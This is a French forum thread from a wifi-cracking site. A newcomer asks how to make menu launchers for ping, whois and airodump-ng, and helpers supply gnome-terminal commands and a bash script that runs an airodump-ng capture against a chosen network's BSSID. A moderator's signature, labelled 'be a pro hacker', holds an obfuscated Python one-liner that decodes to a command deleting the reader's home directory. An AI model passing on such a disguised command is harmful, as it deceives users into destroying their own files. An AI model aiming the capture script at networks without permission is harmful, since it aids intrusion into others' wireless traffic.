Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-05-2011 02:33:11

Jack69
Membre
Inscription : 10-05-2011
Messages : 16

Lancement rapide d'un programme Console via le menu...

Salut la gang de Crack-Wifi,

Je suis assez nouveau sur Linux. Je suis un habitue de Windows et Dos (ooouuuu...) et je me lance dans le merveilleux monde de BackTrack.

BackTrack... Pas tout a fait le BackTrack normal! J'ai eu quelques probleme d'installation donc j'ai decider d'utiliser mon Ubuntu 10.10 et de loader les app de BackTrack!

La, je suis devant un petit probleme!

Pour mon probleme, je vais utiliser le programme "ping" comme exemple.

Quand je suis dans la console, je fait la commande

 [email protected]:~$ ping+IP

et sa marche car j'obtient:

PING XXX.XXX.XX.XX (XXX.XXX.XX.XX) 56(84) bytes of data.
--- XXX.XXX.XX.XX ping statistics ---
58 packets transmitted, 0 received, 100% packet loss, time 57455ms

Si je voudrais faire un Lancement rapide du programme "ping" pour le mettre dans le menu application, je fait comment??

J'ai essaye de cree un lancement rapide dans "Edit Menus" avec la commande:

gnome-terminal ping

et sa n'a pas marcher... Sa m'ouvre le Terminal (Console) mais sans la commande ping. Je sais que le programme ping se trouve dans /usr/bin/

Merci de votre temps!

Jack69


via: Linux Ubuntu 10.10 Mod: BT4R2

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-05-2011 02:59:02

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Lancement rapide d'un programme Console via le menu...

Bonjour et bienvenue.

Tu peut te faire un petit script bash, rien de plus simple.
Je n'ai pas le temps de le faire la de suite, j'ai une peu de taff cette nuit mais regarde ce lien tu vas vite trouver ce qu'il te faut.
Un script dans le genre ça prend deux minutes.

Introduction bash


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#3 12-05-2011 10:39:24

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Lancement rapide d'un programme Console via le menu...

La réponse se trouve dans le manuel ([c]man gnome-terminal[/c]) smile

OPTIONS

-e, --command=STRING
Execute the argument to this option inside the terminal.

-x, --execute
Execute the remainder of the command line inside the terminal.

Je ne sais pas laquelle des 2 options fonctionnera le mieux, à toi d'essayer wink Note que tu peux taper la commande directement depuis un terminal pour la tester (sans devoir créer un lanceur)

gnome-terminal -e ping google.fr
# ou
gnome-terminal -x ping google.fr

Plus d'infos ici --> man gnome-terminal

Hors Ligne

#4 12-05-2011 14:17:01

Jack69
Membre
Inscription : 10-05-2011
Messages : 16

Re : Lancement rapide d'un programme Console via le menu...

Mais dans l'exemple que tu m'a montré, tu fait un test de ping sur google.... Si je ne marque pas de commande supplémentaire (de cible), est-ce que sa va marcher?

Ex:

 gnome-terminal -e ping
# ou
gnome-terminal -x ping

Est-ce qu'il faudrait (absolument) que je script un perle qui me permettrait de crée un choix? Du genre, quand je lance le script, il me demande d'entrer le ip et/ou le host pour continuer et démarer le ping sur le choix donné...

Jack69


via: Linux Ubuntu 10.10 Mod: BT4R2

Hors Ligne

#5 12-05-2011 14:21:30

Jack69
Membre
Inscription : 10-05-2011
Messages : 16

Re : Lancement rapide d'un programme Console via le menu...

UPDATE:

J'ai testé les 2 commande sans suffix (cible) et sa ne marche pas!

Je vais devoir essayé de faire un script! Maintenant j'ai peur lolll!

Jack69


via: Linux Ubuntu 10.10 Mod: BT4R2

Hors Ligne

#6 12-05-2011 15:34:31

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Lancement rapide d'un programme Console via le menu...

Deux questions :
-es-tu connecté à internet ?
-ton réseau local ou ta box laissent-ils passent les requêtes ping ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#7 12-05-2011 15:44:22

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Lancement rapide d'un programme Console via le menu...

Bon, si tu nous donnais directement les commandes que tu veux exécuter, ou au moins ce que tu veux faire ? smile

Si tu veux de l'interactivité, tu peux essayer avec la commande suivante :

gnome-terminal -x echo "Entrer la cible du ping";read IP; ping $IP;

- la commande "echo" va afficher un message pour indiquer à l'utilisateur ce qu'il doit faire
- la commande "read" va lire ce que tu tapes au clavier et sauver ça dans une variable IP
- on donne la variable IP (avec un $ pour montrer que c'est une variable : $IP) à ping pour qu'il l'utilise
Tu peux donner le nom que tu veux à la variable pour "read", et l'utiliser dans la commande après

J'ai pas de Gnome sous la main donc je ne peux pas garantir que ça marche mais normalement c'est bon. Note qu'ici, j'ai tout mis en une ligne parce que ça reste "simple". Si tu veux carrément un menu de choix avec des commandes complexes, alors t'as intérêt à passer par un script (bash) wink

Hors Ligne

#8 12-05-2011 19:55:38

Jack69
Membre
Inscription : 10-05-2011
Messages : 16

Re : Lancement rapide d'un programme Console via le menu...

spawn a écrit :

Deux questions :
-es-tu connecté à internet ?
-ton réseau local ou ta box laissent-ils passent les requêtes ping ?

Oui, je suis connecté via wifi (wlan0)

et oui je peux faire des ping a partir de la console avec la commande!

Mon but est de me faire un script dans le menu pour accès rapide smile

Jack69


via: Linux Ubuntu 10.10 Mod: BT4R2

Hors Ligne

#9 12-05-2011 20:05:48

Jack69
Membre
Inscription : 10-05-2011
Messages : 16

Re : Lancement rapide d'un programme Console via le menu...

antares145 a écrit :

Bon, si tu nous donnais directement les commandes que tu veux exécuter, ou au moins ce que tu veux faire ? smile

Si tu veux de l'interactivité, tu peux essayer avec la commande suivante :

gnome-terminal -x echo "Entrer la cible du ping";read IP; ping $IP;

- la commande "echo" va afficher un message pour indiquer à l'utilisateur ce qu'il doit faire
- la commande "read" va lire ce que tu tapes au clavier et sauver ça dans une variable IP
- on donne la variable IP (avec un $ pour montrer que c'est une variable : $IP) à ping pour qu'il l'utilise
Tu peux donner le nom que tu veux à la variable pour "read", et l'utiliser dans la commande après

J'ai pas de Gnome sous la main donc je ne peux pas garantir que ça marche mais normalement c'est bon. Note qu'ici, j'ai tout mis en une ligne parce que ça reste "simple". Si tu veux carrément un menu de choix avec des commandes complexes, alors t'as intérêt à passer par un script (bash) wink

Ha!! Du concret! Voila une bonne explication antares145! J'ai été sur plusieurs forum et site Linux mais il y à tellement d'information que sa devient presque du chinois!

Donc, admettons que je veules me faire un petit Whois maintenant... Je t'écris mon code et dit moi si c'est bon:

gnome-terminal -x echo "Entrer la cible du whois";read txt; whois $txt;

Dans le fond, la variable (que j'ai mis en txt dans mon exemple de whois) peut avoir n'importe quel nom... "read" copie dans un faux fichier nommé "txt" et "whois" réutilise les infos de "txt" pour faire sa job!?

Est-ce que j'ai bien compris prof? smile


via: Linux Ubuntu 10.10 Mod: BT4R2

Hors Ligne

#10 12-05-2011 20:21:24

Jack69
Membre
Inscription : 10-05-2011
Messages : 16

Re : Lancement rapide d'un programme Console via le menu...

antares145 a écrit :

Bon, si tu nous donnais directement les commandes que tu veux exécuter, ou au moins ce que tu veux faire ? smile

Je suis un habitué de Windows... J'aime l'interface rapide de Linux mais la console me gonfle un peut! Mon but est de mettre mes "tools" dans le menu "Start" «-- (habitué de windows loll) pour sauvé du temps et ne pas a avoir à me rappeler de tout les nom (ping, whois, aircrack-ng, etc.)

Je suis sur Ubuntu 10.10 et j'ai fait une mise a jour manuelle des apps BackTrack 3... Et la, je suis en train de monté un menu BackTrack Tools dans mon menu! Je veux faire des scripts pour accélérer les choses!

Au lieu d'ouvrire une console et de taper "ping 10.123.21.11" je voudrais avoir une icone PING dans mon menu et cliquer dessus pour qu'il ouvre seule!

Bon, "ping" était une exemple pour que je comprenne le fonctionnement! Mais sur airodump-ng, la commande est longue...

 airodump-ng -w test --encrypt wpa -c 11 --bbsid XX:XX:XX:XX:XX wlan0

Donc, avec un script, je voudrais avoir quelque chose comme:

[email protected]:~$ Entrer le nom du fichier sauvegarde puis Entrer:
test

[email protected]:~$ Entrer le type d'encryptage puis Entrer:
wpa

[email protected]:~$ Entrer le canal puis Entrer:
11

[email protected]:~$ Entrer le BBSID puis Entrer:
XX:XX:XX:XX:XX

[email protected]:~$ Entrer le nom d'interface puis Entrer:
wlan0

Comprendo senior? wink


via: Linux Ubuntu 10.10 Mod: BT4R2

Hors Ligne

#11 12-05-2011 20:40:52

Jack69
Membre
Inscription : 10-05-2011
Messages : 16

Re : Lancement rapide d'un programme Console via le menu...

Puisque j'ai 5 information à collecter, j'imagine que je doit faire un script à 5 variable...

Mais lorsque j'ai entrer la dernière variable, est-ce que c'est possible de dire au script:

Ok le grand, tu a les 5 variable, tu exécute la commande:

airodump-ng -w $1 --encrypt $2 -c $3 --bbsid $4 $5

si biensûr je nomme les variables $1,$2,$3,$4 et $5!

Est-ce que mon script devait être:

gnome-terminal -x echo "Entrer le fichier de sauvegarde:";read 1;
gnome-terminal -x echo "Entrer le type d'encryptage:";read 2;
gnome-terminal -x echo "Entrer le canal:";read 3;
gnome-terminal -x echo "Entrer le BBSID:";read 4;
gnome-terminal -x echo "Entrer le nom d'interface:";read 5;
airodump-ng -w $1 --encrypt $2 -c $3 --bbsid $4 $5

Jack69

PS: J'ai déjà fait des petits batch files sous DOS mais sa s'arrête la smile

Dernière modification par Jack69 (12-05-2011 20:42:20)


via: Linux Ubuntu 10.10 Mod: BT4R2

Hors Ligne

#12 12-05-2011 20:43:48

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Lancement rapide d'un programme Console via le menu...

Sí, es mejor así, ahora se puede entender lo que quieres hacer... Como lo pensaba, un pequeño script será mas fácil. Prueba esto :

#!/bin/bash
echo "Entrer le nom du fichier sauvegarde puis Entrer:";
read FILE;
echo "Entrer le type d'encryptage puis Entrer:";
read ENC;
echo "Entrer le canal puis Entrer:";
read CHAN;
echo "Entrer le BSSID puis Entrer:";
read BSSID;
echo "Entrer le nom d'interface puis Entrer:";
read IFACE;
sudo airodump-ng -w $FILE --encrypt $ENC -c $CHAN --bssid $BSSID $IFACE

Colle tout ça dans un fichier que tu appelles disons [c]airodump_script.sh[/c]. Ensuite tu rends ce fichier exécutable :

chmod +x airodump_script.sh

Et finalement, crée un lanceur qui pointe vers ce script :

gnome-terminal -e  ~/airodump_script.sh

Note que tu peux aussi faire un lanceur direct avec la commande en une ligne :

gnome-terminal -x echo "Entrer le nom du fichier sauvegarde puis Entrer:";read FILE;echo "Entrer le type d'encryptage puis Entrer:";read ENC;echo "Entrer le canal puis Entrer:";read CHAN;echo "Entrer le BSSID puis Entrer:";read BSSID;echo "Entrer le nom d'interface puis Entrer:";read IFACE;sudo airodump-ng -w $FILE --encrypt $ENC -c $CHAN --bssid $BSSID $IFACE;

Bon, c'est foireux parce que tu devrais d'abord passer ton interface en mode monitor (puis utiliser mon0), mais tu comprends le principe wink Il y a sûrement moyen de faire un truc plus propre via airoscript-ng mais je connais mal.

Au passage, fais attention, c'est bien BSSID et pas BBSID smile

Hors Ligne

#13 12-05-2011 20:56:14

Jack69
Membre
Inscription : 10-05-2011
Messages : 16

Re : Lancement rapide d'un programme Console via le menu...

Merci vieux! Pour ce qui est du "foireux", si je fait la même manip avec airmon, airodump et aircrack... sa devrait marché lolll!! I hope!


Jack69


via: Linux Ubuntu 10.10 Mod: BT4R2

Hors Ligne

#14 12-05-2011 20:58:21

Jack69
Membre
Inscription : 10-05-2011
Messages : 16

Re : Lancement rapide d'un programme Console via le menu...

Dernière chose... J'aimerais que tu m'explique le "#!/bin/bash", le "sudo" avant la commande finale et le "chmod -x" smile

Jack69


via: Linux Ubuntu 10.10 Mod: BT4R2

Hors Ligne

#15 12-05-2011 21:05:55

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Lancement rapide d'un programme Console via le menu...

Normalement, une ligne qui commence avec une dièse # signifie "commentaire". Ici, la première ligne #!/bin/bash indique l'interpréteur, c'est-à-dire à quel programme le script doit appeler pour s'exécuter. Bash est le shell par défaut, donc quasiment tous tes scripts commenceront par cette ligne wink
--> http://doc.ubuntu-fr.org/tutoriel/script_shell

le "sudo" sert à exécuter une commande en administrateur, c'est-à-dire avec tous les droits. Si tu es en "root" tu n'en as pas besoin mais un utilisateur normal en aura besoin pour que la commande s'exécute. C'est la même chose quand tu veux mettre ton système à jour : [c]sudo apt-get update && sudo apt-get upgrade[/c].
--> http://doc.ubuntu-fr.org/sudo

Le "chmod +x" sert à dire "ce fichier peut être exécuté". Sous linux, tu as les permissions de lecture, les permission d'écriture/modification et les permissions d'exécution. Tu peux par exemple autoriser certaines personnes à lire tes fichiers mais pas les modifier, ou interdire à un compte d'exécuter certains programmes. Ici, tu dois rendre ton fichier exécutable sinon ça sera un simple fichier texte et tu ne pourras pas le lancer wink
--> http://doc.ubuntu-fr.org/permissions

Jack69 a écrit :

Merci vieux!

"Vieux", ça t'en sais rien... wink

Hors Ligne

#16 06-06-2011 16:03:37

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Lancement rapide d'un programme Console via le menu...

inscription d'Antares145: 29-09-2009!

tu es donc  bien un "vieux"!  lol


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
34 8503 05-10-2015 12:24:32 par AlexxC
9 1417 01-06-2015 19:39:27 par yohan
2 3148 02-02-2015 18:40:47 par tita074
4 4142 30-05-2014 09:23:38 par Teeknofil
2 1890 14-01-2014 19:08:43 par kevine6823

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]